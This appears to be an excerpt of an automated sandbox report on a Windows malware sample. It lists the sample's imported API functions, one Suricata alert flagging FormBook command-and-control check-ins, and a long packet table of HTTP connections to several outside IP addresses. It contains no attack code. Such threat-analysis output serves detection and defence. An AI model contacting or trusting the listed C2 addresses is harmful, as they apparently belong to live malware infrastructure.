                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                              PSAPI.DLLGetProcessMemoryInfo
                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                              USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                              UxTheme.dllIsThemeActive
                                                              KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                              GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                              ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                              OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                              Possible Origin

                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishGreat Britain

                                                              Network Behavior

                                                              Suricata IDS Alerts

                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-11-24T08:35:06.513368+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.749849104.18.73.11680TCP

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 24, 2024 08:34:47.834650993 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:47.954336882 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:47.954459906 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:47.971215963 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:48.092149973 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393601894 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393649101 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393673897 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393692970 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393698931 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393718958 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393724918 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393735886 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393742085 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.393753052 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.394040108 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.513791084 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.513874054 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.514009953 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.517802954 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.564449072 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.604008913 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.604166985 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.604273081 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.608208895 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.608325958 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.608412981 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.616616964 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.616729975 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.616805077 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.625015020 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.625164032 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.625241995 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.633524895 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.633565903 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.633637905 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.641858101 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.641944885 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.642029047 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.650465012 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.650502920 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.650584936 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.658752918 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.658829927 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.658958912 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.667279959 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.667310953 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:34:49.667373896 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.676779032 CET4980880192.168.2.790.156.201.74
                                                              Nov 24, 2024 08:34:49.796329975 CET804980890.156.201.74192.168.2.7
                                                              Nov 24, 2024 08:35:05.114991903 CET4984980192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:05.234565973 CET8049849104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:05.234780073 CET4984980192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:05.251280069 CET4984980192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:05.370790005 CET8049849104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:06.513047934 CET8049849104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:06.513269901 CET8049849104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:06.513367891 CET4984980192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:06.770426035 CET4984980192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:07.792604923 CET4985580192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:07.912339926 CET8049855104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:07.912452936 CET4985580192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:07.952327967 CET4985580192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:08.071995020 CET8049855104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:09.187107086 CET8049855104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:09.187813044 CET8049855104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:09.187927008 CET4985580192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:09.461731911 CET4985580192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:10.481338978 CET4986280192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:10.601061106 CET8049862104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:10.601444960 CET4986280192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:10.617640018 CET4986280192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:10.737313986 CET8049862104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:10.737365007 CET8049862104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:11.828428984 CET8049862104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:11.828517914 CET8049862104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:11.828677893 CET4986280192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:12.134836912 CET4986280192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:13.473037958 CET4986880192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:13.592691898 CET8049868104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:13.592839003 CET4986880192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:13.676418066 CET4986880192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:13.798161983 CET8049868104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:14.772567987 CET8049868104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:14.773724079 CET8049868104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:14.773910999 CET4986880192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:14.775950909 CET4986880192.168.2.7104.18.73.116
                                                              Nov 24, 2024 08:35:14.895471096 CET8049868104.18.73.116192.168.2.7
                                                              Nov 24, 2024 08:35:20.596491098 CET4988480192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:20.716109991 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:20.716312885 CET4988480192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:20.736753941 CET4988480192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:20.856322050 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037144899 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037187099 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037242889 CET804988466.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:22.037468910 CET4988480192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:22.243815899 CET4988480192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.262785912 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.382385015 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:23.382519960 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.396985054 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:23.516719103 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.603938103 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.603969097 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.603985071 CET804989266.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:24.604089975 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:24.604161978 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:24.899399042 CET4989280192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:25.918134928 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:26.037683964 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:26.037818909 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:26.053543091 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:26.173074007 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:26.173192978 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304543972 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304569960 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304647923 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:27.304661036 CET804990066.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:27.304702997 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:27.555829048 CET4990080192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.574465036 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.694434881 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:28.694741964 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.704195976 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:28.823807955 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960447073 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960505962 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960515976 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960524082 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:29.960633039 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:29.965162992 CET4990780192.168.2.766.29.148.78
                                                              Nov 24, 2024 08:35:30.084559917 CET804990766.29.148.78192.168.2.7
                                                              Nov 24, 2024 08:35:36.252739906 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:36.372203112 CET8049923207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:36.372312069 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:36.389164925 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:36.508656979 CET8049923207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:37.901230097 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:38.068684101 CET8049923207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:38.918474913 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:39.037916899 CET8049930207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:39.038177967 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:39.053653002 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:39.173260927 CET8049930207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:40.513411999 CET8049923207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:40.513669968 CET4992380192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:40.555841923 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:40.675776958 CET8049930207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:40.675879002 CET4993080192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.575139999 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.694794893 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:41.694972038 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.710814953 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:41.830404043 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:41.830457926 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:43.212044001 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:43.332397938 CET8049939207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:43.332573891 CET4993980192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.231172085 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.350941896 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:44.351237059 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.361748934 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:44.481298923 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:46.098805904 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:46.098917007 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:46.099077940 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:46.102341890 CET4994680192.168.2.7207.148.38.19
                                                              Nov 24, 2024 08:35:46.221848965 CET8049946207.148.38.19192.168.2.7
                                                              Nov 24, 2024 08:35:52.035595894 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:52.155122042 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:52.155242920 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:52.174568892 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:52.294074059 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:53.481556892 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:53.481683969 CET804996262.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:53.481760979 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:53.680838108 CET4996280192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:54.765430927 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:54.884949923 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:54.885159016 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:55.163640022 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:55.283179998 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:56.225536108 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:56.225622892 CET804996962.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:56.225668907 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:56.665596008 CET4996980192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.684091091 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.803515911 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:57.803786993 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.820583105 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:57.940056086 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:57.940129995 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:59.096466064 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:59.096504927 CET804997662.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:35:59.096570969 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:35:59.337213039 CET4997680192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.355895996 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.475394964 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:00.475583076 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.485506058 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:00.604979038 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:01.804045916 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:01.804090023 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:01.804433107 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:01.815226078 CET4998480192.168.2.762.116.130.8
                                                              Nov 24, 2024 08:36:01.934676886 CET804998462.116.130.8192.168.2.7
                                                              Nov 24, 2024 08:36:07.165694952 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:07.285614967 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:07.285782099 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:07.301098108 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:07.421557903 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.551302910 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.551362991 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.551618099 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:08.552274942 CET8049989104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:08.552359104 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:08.805989027 CET4998980192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:09.824836016 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:09.944289923 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:09.944457054 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:09.960706949 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:10.080272913 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.250920057 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.250972986 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.251193047 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:11.251488924 CET8049990104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:11.251552105 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:11.462121964 CET4999080192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.481261015 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.600905895 CET8049991104.21.88.139192.168.2.7
                                                              Nov 24, 2024 08:36:12.601021051 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.617458105 CET4999180192.168.2.7104.21.88.139
                                                              Nov 24, 2024 08:36:12.736932993 CET8049991104.21.88.139192.168.2.7
